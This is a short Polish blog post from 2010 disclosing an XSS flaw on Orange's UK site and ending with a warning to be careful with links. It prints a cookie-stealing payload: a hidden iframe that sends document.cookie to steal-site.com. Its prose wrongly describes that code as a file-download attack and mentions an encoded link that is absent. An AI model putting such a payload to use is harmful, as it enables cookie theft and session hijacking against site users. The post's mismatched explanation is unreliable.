29 stycznia 2010

Witryna Orange podatna na XSS! [przykład praktyczny]

Brytyjska witryna potentata z branży telefonii komórkowej http://www.orange.co.uk/ podatna jest na ataki typu XSS (ang. Cross-Site Scripting). XSS polega w skrócie na osadzeniu w treści atakowanej strony kodu, który wyświetlony innym użytkownikom może doprowadzić do wykonania przez nich niepożądanych akcji. Zapraszam do zapoznania się praktycznym przykładem tego rodzaju ataku na przykładzie witryny Orange.

Luka obecna w witrynie http://www.orange.co.uk/ pozwala atakującemu na wstrzyknięcie własnego kodu HTML lub JavaScript w celu przechwycenia zawartości cookies. Poniżej można się zapoznać z ilustracją prezentującą Proof of Concept w działaniu:
Luka może również posłużyć intruzowi do podsunięcia ofierze specjalnie spreparowanego odnośnika do witryny Orange, który spowoduje u potencjalnej ofiary rozpoczęcie pobierania dowolnego pliku. Kod pozwalający na wykonanie tego typu ataku ma następującą postać:
iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")/iframe
Odnośnik http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe może oczywiście zostać zastąpiony dowolnym innym adresem.

Po heksadecymalnym zakodowaniu złośliwego kodu, ostatecznie odnośnik może przyjąć następującą formę:
Jak każdy z nas może się przekonać, jego otwarcie spowoduje rozpoczęcie pobierania pliku winamp5572_lite_en-us.exe!

Warto więc zawsze zachować czujność, nawet w przypadku otwierania odnośników zawierających na początku adresy znanych nam witryn!

[źródło]